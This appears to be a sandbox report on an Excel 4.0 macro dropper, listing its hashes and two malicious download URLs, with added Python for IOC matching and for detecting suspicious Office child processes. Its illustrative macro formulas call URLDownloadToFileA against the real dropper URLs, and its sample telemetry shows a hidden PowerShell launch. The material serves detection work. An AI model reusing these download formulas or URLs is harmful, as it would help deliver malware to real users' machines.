General

  • Target

    b3970659be5d7ebcfb49e251b24a795f

  • Size

    36KB

  • Sample

    240305-ddal1acf71

  • MD5

    b3970659be5d7ebcfb49e251b24a795f

  • SHA1

    afb4e951585a6325737fcbd2f09d2299c0a732d1

  • SHA256

    765a3fc715cd0a124f8f331a4f36b17b990e0aa571c7b7f97e4f3c3cef6a63b2

  • SHA512

    4dc436c923a1011a95a388778800610c6873108c92e2037687aac8d837469b05f1ef1d49ca4e7bc103dcb948b53f56e0b247c9cecf648a63db0248aa3a4ca53e

  • SSDEEP

    768:cPqNk3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ3i90UIfxSx3gB4U11CcQ2:Iok3hbdlylKsgqopeJBWhZFGkE+cL2N6

Score
10/10

Malware Config

Extracted

  • Language
    xlm4.0

  • Source / URLs
    xlm40.dropper    https://markens.online/wp-data.php
    xlm40.dropper    https://statedauto.com/wp-data.php
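The digests and the two dropper URLs above are the report's indicators. The Python below is an added example, not part of the sandbox report, that checks a file's digests against those hashes and pulls URLs out of decoded Excel 4.0 macro formulas, rejoining string literals that the macro has split with the "&" operator (a common trick so that no single cell holds the whole URL). The formula cells, the URLDownloadToFileA call shape and the file paths in them are constructed for illustration and are not the contents of this sample.

```python
import hashlib
import re
from urllib.parse import urlparse

# IOCs copied from the report above (digests of the 36KB XLM 4.0 dropper).
REPORT_HASHES = {
    "md5": "b3970659be5d7ebcfb49e251b24a795f",
    "sha1": "afb4e951585a6325737fcbd2f09d2299c0a732d1",
    "sha256": "765a3fc715cd0a124f8f331a4f36b17b990e0aa571c7b7f97e4f3c3cef6a63b2",
}
REPORT_URLS = {
    "https://markens.online/wp-data.php",
    "https://statedauto.com/wp-data.php",
}
REPORT_DOMAINS = {urlparse(u).hostname for u in REPORT_URLS}

# An http(s) URL inside a formula; stops at the closing quote or whitespace.
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
# XLM droppers split string literals with '&' ("https://stat"&"edauto...");
# removing the '"&"' seam restores the literal before URL extraction.
CONCAT_RE = re.compile(r'"\s*&\s*"')


def hash_bytes(data: bytes) -> dict:
    """Return md5/sha1/sha256 hex digests of a byte string."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def matches_report_hashes(data: bytes) -> bool:
    """True if any digest of `data` equals the corresponding report digest."""
    digests = hash_bytes(data)
    return any(digests[k] == v for k, v in REPORT_HASHES.items())


def extract_urls(formulas) -> set:
    """Collect URLs from decoded XLM 4.0 formula text after rejoining
    '&'-concatenated string literals."""
    found = set()
    for cell in formulas:
        joined = CONCAT_RE.sub("", cell)
        found.update(URL_RE.findall(joined))
    return found


def match_iocs(formulas) -> dict:
    """Compare URLs and hostnames found in the formulas with the report's IOCs."""
    urls = extract_urls(formulas)
    domains = {urlparse(u).hostname for u in urls}
    return {
        "urls": urls,
        "matched_urls": urls & REPORT_URLS,
        "matched_domains": domains & REPORT_DOMAINS,
    }


# Constructed sample cells (hypothetical; not the cells of this sample) in the
# shape XLM droppers commonly take. The second URL is split with '&'.
SAMPLE_FORMULAS = [
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
    '"https://markens.online/wp-data.php","C:\\Users\\Public\\tmp1.dll",0,0)',
    '=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
    '"https://stated"&"auto.com/wp-data.php","C:\\Users\\Public\\tmp2.dll",0,0)',
    "=HALT()",
]

if __name__ == "__main__":
    print(match_iocs(SAMPLE_FORMULAS))
    # No sample bytes are embedded here, so this is expected to be False.
    print(matches_report_hashes(b"not the sample"))
```

Feed extract_urls the decoded formula strings you get from your XLM dumper of choice; the hash check is only meaningful against the original 36KB file, which this page does not carry.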

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
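The signature above fires on an unexpected parent/child process relationship but does not name the processes. The Python below is an added example, not part of the sandbox report, of the detection logic a SOC would run over process-creation telemetry for this class of sample: it walks each process's ancestry and flags anything descended from an Office host that is not on a small allowlist. The assumption that Excel is the host follows from the XLM 4.0 language tag; the event records, the allowlist and the cmd.exe/powershell.exe children are constructed for illustration and are not what this sample spawned.

```python
# Office binaries that may host macros (assumption: extend for your estate).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Children Office legitimately starts on its own (assumption: tune per environment).
ALLOWED_CHILDREN = {"splwow64.exe", "excel.exe", "winword.exe", "powerpnt.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, for case-insensitive matching."""
    return path.rsplit("\\", 1)[-1].lower()


def lineage(events_by_pid: dict, pid: int) -> list:
    """Image names from `pid` up to the root we have events for, child first.
    A `seen` set guards against pid reuse producing a cycle."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)
        event = events_by_pid[pid]
        chain.append(image_name(event["image"]))
        pid = event["ppid"]
    return chain


def flag_unexpected_children(events: list) -> list:
    """Return one finding per process that has an Office ancestor and is not
    an allowlisted child. Grandchildren (Excel -> cmd -> powershell) are
    caught because the whole ancestry is inspected, not only the direct parent."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for event in events:
        name = image_name(event["image"])
        if name in ALLOWED_CHILDREN:
            continue
        chain = lineage(by_pid, event["pid"])
        ancestors = chain[1:]
        if any(a in OFFICE_PARENTS for a in ancestors):
            findings.append({
                "pid": event["pid"],
                "chain": " <- ".join(chain),
                "cmdline": event["cmdline"],
            })
    return findings


# Constructed process-creation events (Sysmon Event ID 1-style fields).
# Hypothetical tree: explorer -> EXCEL (opening a .xls) -> splwow64 (benign),
# and EXCEL -> cmd -> powershell (the shape the signature is meant to catch).
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "EXCEL.EXE invoice.xls"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe"},
    {"pid": 3000, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"pid": 3100, "ppid": 3000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden"},
]

if __name__ == "__main__":
    for finding in flag_unexpected_children(SAMPLE_EVENTS):
        print(finding)
```

Keep the allowlist short: the value of this rule comes from Office almost never needing to spawn anything, so every exception you add is a gap an XLM dropper can hide in.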

MITRE ATT&CK Enterprise v15

Tasks